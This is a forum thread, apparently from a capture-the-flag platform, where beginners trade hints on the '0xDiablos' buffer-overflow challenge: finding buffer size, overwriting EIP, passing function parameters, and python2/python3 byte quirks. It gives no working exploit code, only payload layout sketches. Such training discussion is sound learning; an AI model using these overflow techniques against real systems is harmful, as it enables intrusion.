[pwn] You know 0xDiablos

I would be interrested If someone could give me some tip too, i noob and need help for start, thx a lot

Hi guys,

Could anyone help me out… or just point to me to the right resources… I’m extremely new at this… (i’m doing the Beginner Track)

I’ve got the buffer size figured out, the address of the function to go to… i’m trying to put it on the ISP.
Am I on the right path?

I know i need some params… where should i put those…

I’m really lost… thanks a lot…

I don’t want the answer, i want help.

I think I’m very close to get the flag.
Locally everything works just fine (even the part with the params), but when I try to send my payload to the server, nothing happens. I’m probably screwing up something with my script.

Can anybody give me a nudge in PM?

Type your comment> @7h3B4dg3r said:

I think I’m very close to get the flag.
Locally everything works just fine (even the part with the params), but when I try to send my payload to the server, nothing happens. I’m probably screwing up something with my script.

Can anybody give me a nudge in PM?

Nevermind, I did it. :slight_smile:

I feel I’m on the right track, but I just can’t get the payload right. I’m pretty sure I’ve gotten the correct buffer size (I’ve verified using a debugger), and I know the address of what I want to call with params.
When I enter my payload and run it through a debugger, the address is wrong in the debugger, even though it’s correct in the input. Instead of ‘e2’ it’s showing as ‘c2’.
I’d appreciate anything you could throw my way to help get me going.

I could use a nudge. I can get “Hurry up and try…” but when i try on the instance i get nothing. I see the parameters required. I tried putting them in right behind my address… lets say param1 = A, param2 = B

JUNK+A+B+ADDRESS
JUNK+B+A+ADDRESS

neither worked. i also tried the values of A and B forward/backwards. Can anyone help with passing the parameters? Thanks

Type your comment> @pythonK said:

I feel I’m on the right track, but I just can’t get the payload right. I’m pretty sure I’ve gotten the correct buffer size (I’ve verified using a debugger), and I know the address of what I want to call with params.
When I enter my payload and run it through a debugger, the address is wrong in the debugger, even though it’s correct in the input. Instead of ‘e2’ it’s showing as ‘c2’.
I’d appreciate anything you could throw my way to help get me going.

I figured out my problem. It’s the way python3 was sending the info was wrong. But python2 sends it correctly. Still haven’t solved it yet, but I’m closer.

just started this and i feel like i’m in the right direction.
i’m sending my payload with all parameters but still don’t manage to get the fl…t.t file
although i’ve created it locally.

Could use a nudge (:
thanks

got it! nice one!

I got the flag… but it only works some of the time? I thankfully ran my code a few times after double checking things, and poof, flag showed up when it didn’t on the first couple runs.

Running it again, it doesn’t show up. Is this intentional, or is there something funny going on?

got it! thanks @BLAMO last piece i wasn’t getting. It makes sense now. anyone need a hand hit me up.

The tips here were definitely useful. If you haven’t done a BOF before (which I have seen mentioned here a few times, so I’m assuming it’s not a spoiler) you should definitely look up a tutorial and understand that before trying this. A few things that were time wasters for me :

1: If you are going to use Python to automate your exploit for the love of god use python2. I ran into some weird issues trying to get my payload to function properly which I am assuming is because Python3 changed how they handle strings.

2: There may be extra bytes in places you don’t expect : c - Why is ebx saved in the stack frame of a simple function, calling gets? - Stack Overflow

Got the flag :). Could anyone get this exploit to work in Python 3? I managed to do it with Python 2 in the end, but would’ve liked to do it in Python 3…

I’ve never done a BUF before and im trying to read through assembly docuementiation but I think I have the right idea, ive made a payload to send and have the address I need, but I still get a fault error when sending it.

If someone could pm me a hint or something that would be great. I also dont know where to put variables

Type your comment> @Oscuridad said:

I’ve never done a BUF before and im trying to read through assembly docuementiation but I think I have the right idea, ive made a payload to send and have the address I need, but I still get a fault error when sending it.

If someone could pm me a hint or something that would be great. I also dont know where to put variables

Send me the exploit on discord “Alex Zander#0764”

I’m confused, I’m testing a BOF, and successfully overwriting EIP in a VM, but doing the same on a physical box doesn’t work?

ASLR is off on both…

Same length payload of 'A’s, then 4* ‘B’, and 4* 'C’s.

On the VM : EIP gets ‘BBBB’, with ESP at ‘CCCC’.
On the physical box : EIP gets ‘AAAA’, with ESP at ‘BBBBCCCC’ ?

Environments were NOT the same! Lesson learned. Problem solved.

I am really confused. In Kali VM, using gdb/gef/pwntools after many hours finally got a successful exploit.py (from gef skel) working. But only locally. Remotely I get the 'A’s string echoed back. Playing with the length of those ‘A’ I will get same thing back, or nothing, or connection refused for several minutes.

I do not understand why it would work in VM but not remotely. I cannot imagine that remotely it is not running in a VM or Docker container…

Type your comment> @Baseizo7 said:

I am really confused. In Kali VM, using gdb/gef/pwntools after many hours finally got a successful exploit.py (from gef skel) working. But only locally. Remotely I get the 'A’s string echoed back. Playing with the length of those ‘A’ I will get same thing back, or nothing, or connection refused for several minutes.

I do not understand why it would work in VM but not remotely. I cannot imagine that remotely it is not running in a VM or Docker container…

Never mind! Figured it out. h4x0r error. Apparently I have trouble noticing glaring numerical typos right in front of me for hours.

Hi,
can anybody give me any help, please ?
I have a payload without bad characters and go through gdb+peda but can’t make it work even locally.
Redirect EIP to method with both parameters but still no success.
Thanks.